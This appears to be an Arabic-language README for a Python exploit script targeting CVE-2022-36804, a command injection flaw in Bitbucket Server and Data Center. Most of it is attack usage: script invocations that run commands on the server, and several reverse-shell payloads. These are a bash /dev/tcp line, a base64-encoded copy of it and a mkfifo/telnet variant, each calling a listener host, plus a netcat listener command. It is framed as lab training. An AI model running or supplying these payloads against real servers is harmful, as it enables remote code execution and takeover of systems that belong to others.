
تم اكتشاف ثغرة أمنية خطيرة من نوع حقن الأوامر (Command Injection) في نقاط نهاية (Endpoints) متعددة لواجهة برمجة التطبيقات (API) في خادم Atlassian Bitbucket ومركز البيانات (Data Center). تؤثر هذه الثغرة على جميع إصدارات Bitbucket Server وData Center الصادرة قبل الإصدارات <7.6.17 و<7.17.10 و<7.21.4 و<8.0.3 و<8.1.2 و<8.2.2 و<8.3.1
تم اكتشاف ثغرة حرجة في حقن الأوامر في نقاط نهاية API متعددة في Atlassian Bitbucket Server وData Center. تؤثر هذه الثغرة على جميع إصدارات Bitbucket Server وData Center الصادرة قبل الإصدارات <7.6.17> و<7.17.10> و<7.21.4> و<8.0.3> و<8.1.2> و<8.2.2> و<8.3.1>
docker build -t bitbucket .
docker run -it bitbucket
python3 cve-2022-36804.py -u http://172.17.0.2:7990
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c id
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c whoami -p NEW -r newrepo
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -p NEW -r newrepo --session 2074CFF8A5D13088332C8DF0CD8A7CE7
استبدل 172.17.0.3 بعنوان IP المحلي الخاص بك
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "/bin/bash -i >& /dev/tcp/172.17.0.3/4444 0>&1"
ابدأ مستمع netcat بالأمر التالي:
nc -lvp 4444
قم بتحويل /bin/bash -i >& /dev/tcp/172.17.0.3/4444 0>&1 إلى base64 في حال حدوث خطأ في تنفيذ الحمولة.
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE3Mi4xNy4wLjMvNDQ0NCAwPiYx' | base64 -d | bash |"
إذا كنت لا تزال تواجه أي خطأ، فنفّذ الأمر التالي:
TF=$(mktemp -u);mkfifo $TF && telnet 172.17.0.3 4444 0<$TF | /bin/bash 1>$TF
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "TF=$(mktemp -u);mkfifo $TF && telnet 172.17.0.3 4444 0<$TF | /bin/bash 1>$TF"
يُنصح بتثبيت إصدار Bitbucket Server المتأثر بالثغرة على جهاز يعمل بنظام Windows/Linux لأغراض التدريب. سيكون الحصول على قشرة عكسية (reverse shell) أسهل مقارنةً بصور Docker.
يمكن العثور على مزيد من المعلومات هنا